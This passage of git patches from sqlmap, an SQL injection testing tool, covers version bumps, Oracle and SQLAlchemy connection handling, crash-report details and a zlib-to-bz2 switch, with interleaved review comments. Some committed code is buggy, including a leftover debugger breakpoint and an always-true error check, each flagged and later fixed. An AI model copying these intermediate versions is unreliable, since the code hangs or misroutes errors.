9db49e57a42..f127191b495 100644 --- a/txt/checksum.md5 
+++ b/txt/checksum.md5 @@ -46,14 +46,14 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1887ce5c0983ffbeda639e3110a54521 lib/core/settings.py +390a33fe4fce640f5f226a68a7007778 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -35a1b50e3687e1a174073b46c8022c81 lib/core/update.py +1c2e5a9a34d4778c336a3d66d86ad000 lib/core/update.py fc624104ddb36d41794b7a943fde5f21 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From fc06d4d9cbc2362fdaf981bec119c96213f174c4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 21 Jan 2018 11:54:42 +0100 Subject: [PATCH 010/428] Adding full OS info in error reports --- lib/core/common.py | 3 ++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 06a4799bd8c..63d5f36cd31 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -19,6 +19,7 @@ import logging import ntpath import os +import platform import posixpath import random import re 
@@ -3289,7 +3290,7 @@ def unhandledExceptionMessage(): errMsg += "and get back to you\n" errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:] errMsg += "Python version: %s\n" % PYVERSION - errMsg += "Operating system: %s\n" % PLATFORM + errMsg += "Operating system: %s\n" % platform.platform() errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap\.py\b", "sqlmap.py", getUnicode(" ".join(sys.argv), encoding=sys.stdin.encoding)) errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None)) errMsg += "Back-end DBMS:" diff --git a/lib/core/settings.py b/lib/core/settings.py index 114dc92ec5b..67007eb7a83 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.13" +VERSION = "1.2.1.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f127191b495..05005700407 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 62fade52c1524364e6e0653c31143a9c lib/core/bigarray.py -8bfcc9511c4956ad22b62aa2c8f6386e lib/core/common.py +27d1b0a4609eece643141408d1f18716 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
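Review bot: `platform.platform()` puts the full OS release/build string into a message users are asked to paste into public bug reports, next to the already-included command line; that is a wider disclosure than the previous `PLATFORM` value and deserves a one-line comment on the new line, e.g. `# full OS string (kernel/distro/arch) is intentionally included in bug reports`, or a mention in the report preamble so users know what they are sending. If nothing else in this file reads `PLATFORM` after this change, its import can be dropped — not visible from the hunk. unhandledExceptionMessage starts and continues outside the hunk.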
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -390a33fe4fce640f5f226a68a7007778 lib/core/settings.py +6d8165a67243d0bc98f7bbc4d9b1ec36 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From a7bf4f47e6bae8440f87ca565c93c5059d7e6478 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 25 Jan 2018 12:13:33 +0100 Subject: [PATCH 011/428] Update related to the #2677 --- lib/core/settings.py | 2 +- plugins/dbms/oracle/connector.py | 7 ++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 67007eb7a83..16c59dd312e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.14" +VERSION = "1.2.1.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py index aa6be3b19bf..c74770d0864 100644 --- a/plugins/dbms/oracle/connector.py +++ b/plugins/dbms/oracle/connector.py @@ -12,6 +12,7 @@ import logging import os +import re from lib.core.convert import utf8encode from lib.core.data import conf 
@@ -42,7 +43,11 @@ def connect(self):
         try:
             self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password, mode=cx_Oracle.SYSDBA)
             logger.info("successfully connected as SYSDBA")
-        except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError):
+        except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError), ex:
+            if "" in str(ex):
+                msg = re.sub(r'DPI-\d+:\s+|: "[^"]+"', "", str(ex))
+                raise SqlmapConnectionException(msg)
+
         try:
             self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password)
         except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError), msg:
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 05005700407..2bcd0594354 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-6d8165a67243d0bc98f7bbc4d9b1ec36 lib/core/settings.py
+7bf6ba3c580b0a956d82189140784d17 lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py
@@ -173,7 +173,7 @@ d6836e2a6a308eb3536e2e7fc74fdc8b plugins/dbms/mysql/filesystem.py
 88b876f085fec2569a0697f4b69f41da plugins/dbms/mysql/__init__.py
 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py
 f30009816db6a0b41342301f0d657a01 plugins/dbms/mysql/takeover.py
-9a50b600d65d178b374d19775d1f95e4 plugins/dbms/oracle/connector.py
+120637663f66cbb40f44a3a3bb2260dc plugins/dbms/oracle/connector.py
 e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py
 c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py
 e16cbf8abda91a906ca7bafb81d8866e plugins/dbms/oracle/fingerprint.py
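Review bot: `if "" in str(ex):` is always true, since the empty string is a substring of every string, so every failed SYSDBA attempt now raises SqlmapConnectionException and the plain (non-SYSDBA) connect that follows is unreachable; the next patch in this series replaces the test with `"Oracle Client library" in str(ex)`, which is what was evidently intended. The cleanup regex `: "[^"]+"` also deletes every quoted fragment from the message, not only the library path, so the user-facing text can lose context. connect() continues outside the hunk.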
From c5730ee88d35e0718efa94d17d673b942e54ee4a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 25 Jan 2018 12:23:54 +0100
Subject: [PATCH 012/428] Update related to the #2677
---
 lib/core/settings.py | 2 +-
 plugins/dbms/oracle/connector.py | 6 ++++--
 txt/checksum.md5 | 4 ++--
 3 files changed, 7 insertions(+), 5 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 16c59dd312e..6a4bbe4020a 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.1.15"
+VERSION = "1.2.1.16"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py
index c74770d0864..fc8946ada07 100644
--- a/plugins/dbms/oracle/connector.py
+++ b/plugins/dbms/oracle/connector.py
@@ -44,8 +44,10 @@ def connect(self):
             self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password, mode=cx_Oracle.SYSDBA)
             logger.info("successfully connected as SYSDBA")
         except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError), ex:
-            if "" in str(ex):
-                msg = re.sub(r'DPI-\d+:\s+|: "[^"]+"', "", str(ex))
+            if "Oracle Client library" in str(ex):
+                msg = re.sub(r"DPI-\d+:\s+", "", str(ex))
+                msg = re.sub(r': ("[^"]+")', r" (\g<1>)", msg)
+                msg = re.sub(r". See (http[^ ]+)", r'. See "\g<1>"', msg)
                 raise SqlmapConnectionException(msg)
 
         try:
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 2bcd0594354..30edc2ae44e 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
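Review bot: The branch keys on prose (`"Oracle Client library" in str(ex)`) while the first `re.sub` throws away the `DPI-\d+` code that identifies the condition precisely; matching on that code and only then prettifying the text would survive wording changes in the driver, e.g. `code = re.search(r"DPI-\d+", str(ex))` followed by a comparison against the documented code for the missing-client case (not quoted here, as it is not on the page). Re-raising as SqlmapConnectionException also discards the original exception type and traceback, which is acceptable for a user-facing message but worth a short comment on the `raise`. connect() continues outside the hunk.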
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7bf6ba3c580b0a956d82189140784d17 lib/core/settings.py +d623d7a3c0c977964f451ca20b0b15aa lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -173,7 +173,7 @@ d6836e2a6a308eb3536e2e7fc74fdc8b plugins/dbms/mysql/filesystem.py 88b876f085fec2569a0697f4b69f41da plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py f30009816db6a0b41342301f0d657a01 plugins/dbms/mysql/takeover.py -120637663f66cbb40f44a3a3bb2260dc plugins/dbms/oracle/connector.py +999cb8d0d52820d30bdd4b3d658a765d plugins/dbms/oracle/connector.py e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py e16cbf8abda91a906ca7bafb81d8866e plugins/dbms/oracle/fingerprint.py From 4bf20066eca90a3da6d2c5314c70b97a256c0ef4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 25 Jan 2018 12:29:56 +0100 Subject: [PATCH 013/428] Update related to the #2769 --- lib/core/settings.py | 2 +- lib/utils/sqlalchemy.py | 10 +++++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 12 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6a4bbe4020a..b20c9bab35d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.1.16"
+VERSION = "1.2.1.17"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py
index 50f3d5cc8aa..ecbe9786af7 100644
--- a/lib/utils/sqlalchemy.py
+++ b/lib/utils/sqlalchemy.py
@@ -41,6 +41,8 @@ def __init__(self, dialect=None):
 def connect(self):
 if _sqlalchemy:
+ import pdb
+ pdb.set_trace()
 self.initConnection()
 try:
@@ -54,7 +56,13 @@ def connect(self):
 if self.dialect:
 conf.direct = conf.direct.replace(conf.dbms, self.dialect, 1)
- engine = _sqlalchemy.create_engine(conf.direct, connect_args={"check_same_thread": False} if self.dialect == "sqlite" else {})
+ if self.dialect == "sqlite":
+ engine = _sqlalchemy.create_engine(conf.direct, connect_args={"check_same_thread": False})
+ elif self.dialect == "oracle":
+ engine = _sqlalchemy.create_engine(conf.direct, connect_args={"allow_twophase": False})
+ else:
+ engine = _sqlalchemy.create_engine(conf.direct, connect_args={})
+
 self.connector = engine.connect()
 except (TypeError, ValueError):
 if "_get_server_version_info" in traceback.format_exc():
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 30edc2ae44e..7f9769f01af 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
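Review bot: `import pdb` followed by `pdb.set_trace()` at the top of connect() drops every direct-connection run into the interactive debugger and blocks on stdin, which hangs any non-interactive or API-driven invocation; it reads as a debugging leftover that should not have reached the branch. The following commit on this page removes exactly these two lines, so this hunk should have been dropped before pushing. connect()'s body continues past the hunk.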
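Review bot: The three `_sqlalchemy.create_engine(conf.direct, connect_args=...)` calls in the second hunk differ only in the `connect_args` dict, so the branching is clearer as a lookup: `connect_args = {"sqlite": {"check_same_thread": False}, "oracle": {"allow_twophase": False}}.get(self.dialect, {})` followed by `engine = _sqlalchemy.create_engine(conf.direct, connect_args=connect_args)`. That keeps a single call site to extend when another dialect needs driver-specific arguments. connect()'s body continues past the hunk.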
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d623d7a3c0c977964f451ca20b0b15aa lib/core/settings.py +50a0f84801ca7dcc40fd3112320d3fe2 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -112,7 +112,7 @@ a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 5d6d73d27833eef1b10b9215629533ff lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py -3abe64e696ad75ad28cadf2695a58be8 lib/utils/sqlalchemy.py +d0c473a44e2967d9ba2af688d34b9194 lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py e426eae9ddf6a42bcb6b7355e2c2936f lib/utils/versioncheck.py 1e9cf437451ff8147a372a002641b963 lib/utils/xrange.py From 02661c166dfa5b1dc97d22ca6a7f8ac10d290d55 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 25 Jan 2018 12:31:22 +0100 Subject: [PATCH 014/428] Removing leftover pdb (#2769) --- lib/core/settings.py | 2 +- lib/utils/sqlalchemy.py | 2 -- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b20c9bab35d..04fb56a80df 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.17" +VERSION = "1.2.1.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py index ecbe9786af7..3644a6d2453 100644 
--- a/lib/utils/sqlalchemy.py +++ b/lib/utils/sqlalchemy.py @@ -41,8 +41,6 @@ def __init__(self, dialect=None): def connect(self): if _sqlalchemy: - import pdb - pdb.set_trace() self.initConnection() try: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7f9769f01af..b85c14203c3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -50a0f84801ca7dcc40fd3112320d3fe2 lib/core/settings.py +1349fdfa1f60244969299a4431024420 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -112,7 +112,7 @@ a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 5d6d73d27833eef1b10b9215629533ff lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py -d0c473a44e2967d9ba2af688d34b9194 lib/utils/sqlalchemy.py +4b17311256f0081904a67831252e3fb9 lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py e426eae9ddf6a42bcb6b7355e2c2936f lib/utils/versioncheck.py 1e9cf437451ff8147a372a002641b963 lib/utils/xrange.py From fd8bbaff9f102480482525e7bcacd606d2b504ff Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 31 Jan 2018 00:15:11 +0100 Subject: [PATCH 015/428] Minor update of error regexes --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/errors.xml | 4 ++++ 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 04fb56a80df..af9455b436b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.18" +VERSION = "1.2.1.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b85c14203c3..bf3edc07244 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1349fdfa1f60244969299a4431024420 lib/core/settings.py +0fe2ab6fe688d723c96b1f0326d4bdb5 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -461,7 +461,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml -9567590d35dfd9f214b9979e6000b139 xml/errors.xml +0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 14a2abeb88b00ab489359d0dd7a3017f xml/payloads/boolean_blind.xml b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml diff --git a/xml/errors.xml b/xml/errors.xml index e84ad922e46..a4c95b2a526 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -6,10 +6,12 @@ + + @@ -35,9 +37,11 @@ + + From 30f8c30d6aa5a9420d3900bb1ccfb5bbbfb0eaf6 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Wed, 31 Jan 2018 10:36:13 +0100 Subject: [PATCH 016/428] Minor update --- lib/core/bigarray.py | 8 ++++---- lib/core/settings.py | 4 ++-- lib/utils/versioncheck.py | 4 ++-- txt/checksum.md5 | 6 +++--- 4 files changed, 11 insertions(+), 11 deletions(-) diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index 51f93404a8e..f733b81cbe5 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -10,11 +10,11 @@ except: import pickle +import bz2 import itertools import os import sys import tempfile -import zlib from lib.core.enums import MKSTEMP_PREFIX from lib.core.exception import SqlmapSystemException @@ -86,7 +86,7 @@ def pop(self): self.chunks.pop() try: with open(self.chunks[-1], "rb") as f: - self.chunks[-1] = pickle.loads(zlib.decompress(f.read())) + self.chunks[-1] = pickle.loads(bz2.decompress(f.read())) except IOError, ex: errMsg = "exception occurred while retrieving data " errMsg += "from a temporary file ('%s')" % ex.message @@ -107,7 +107,7 @@ def _dump(self, chunk): self.filenames.add(filename) os.close(handle) with open(filename, "w+b") as f: - f.write(zlib.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL)) + f.write(bz2.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL)) return filename except (OSError, IOError), ex: errMsg = "exception occurred while storing data " @@ -125,7 +125,7 @@ def _checkcache(self, index): if not (self.cache and self.cache.index == index): try: with open(self.chunks[index], "rb") as f: - self.cache = Cache(index, pickle.loads(zlib.decompress(f.read())), False) + self.cache = Cache(index, pickle.loads(bz2.decompress(f.read())), False) except IOError, ex: errMsg = "exception occurred while retrieving data " errMsg += "from a temporary file ('%s')" % ex.message diff --git a/lib/core/settings.py b/lib/core/settings.py index af9455b436b..98fd3f55f86 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
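Review bot: `bz2.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL)` in the _dump hunk now passes the setting as bz2's compresslevel, which only accepts 1 through 9, whereas zlib.compress also accepted 0 (store). The current value 9 is valid, but the settings.py hunk of this same commit still documents the range as `(0-9)`; it should read `# Compress level used for storing BigArray chunks to disk (1-9)` so that a future tweak to 0 does not surface as a ValueError at dump time. The pop and _checkcache hunks still feed the decompressed file content straight into `pickle.loads`, which is acceptable only as long as the temporary chunk files stay writable by this process alone; a short comment next to those loads stating that assumption would help later readers. _dump's, pop's and _checkcache's bodies continue outside their hunks.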
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.19" +VERSION = "1.2.1.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -531,7 +531,7 @@ # Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory) BIGARRAY_CHUNK_SIZE = 1024 * 1024 -# Compress (zlib) level used for storing BigArray chunks to disk (0-9) +# Compress level used for storing BigArray chunks to disk (0-9) BIGARRAY_COMPRESS_LEVEL = 9 # Maximum number of socket pre-connects diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py index ae2a15e118b..21249997bfb 100644 --- a/lib/utils/versioncheck.py +++ b/lib/utils/versioncheck.py @@ -10,9 +10,9 @@ PYVERSION = sys.version.split()[0] if PYVERSION >= "3" or PYVERSION < "2.6": - exit("[CRITICAL] incompatible Python version detected ('%s'). For successfully running sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % PYVERSION) + exit("[CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % PYVERSION) -extensions = ("gzip", "ssl", "sqlite3", "zlib") +extensions = ("bz2", "gzip", "ssl", "sqlite3", "zlib") try: for _ in extensions: __import__(_) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bf3edc07244..1365a2102ac 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -26,7 +26,7 @@ ccd66880fc677a3c83db2a3a70d196d7 lib/controller/controller.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py -62fade52c1524364e6e0653c31143a9c lib/core/bigarray.py +86a4703d5474badd8462146510b2c460 lib/core/bigarray.py 27d1b0a4609eece643141408d1f18716 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0fe2ab6fe688d723c96b1f0326d4bdb5 lib/core/settings.py +2ef6392db210a10901554ea061ee7256 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -114,7 +114,7 @@ a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py 4b17311256f0081904a67831252e3fb9 lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py -e426eae9ddf6a42bcb6b7355e2c2936f lib/utils/versioncheck.py +ce5ec6300bc0a185827a21d8a8f09de3 lib/utils/versioncheck.py 1e9cf437451ff8147a372a002641b963 lib/utils/xrange.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py From 31fa7f6c944dbc8a8930a5d92c216a819aee098a Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Wed, 31 Jan 2018 10:50:34 +0100 Subject: [PATCH 017/428] Trivial update# --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- lib/takeover/web.py | 2 +- lib/utils/crawler.py | 2 +- lib/utils/har.py | 2 +- lib/utils/hash.py | 14 +++++++------- plugins/generic/enumeration.py | 6 +++--- txt/checksum.md5 | 14 +++++++------- 8 files changed, 22 insertions(+), 22 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 63d5f36cd31..a18daef0613 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -770,7 +770,7 @@ def getManualDirectories(): checkFile(listPath) directories = getFileItems(listPath) elif choice == '4': - targets = set([conf.hostname]) + targets = {conf.hostname} _ = conf.hostname.split('.') if _[0] == "www": diff --git a/lib/core/settings.py b/lib/core/settings.py index 98fd3f55f86..e0b9fe0158c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.20" +VERSION = "1.2.1.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') 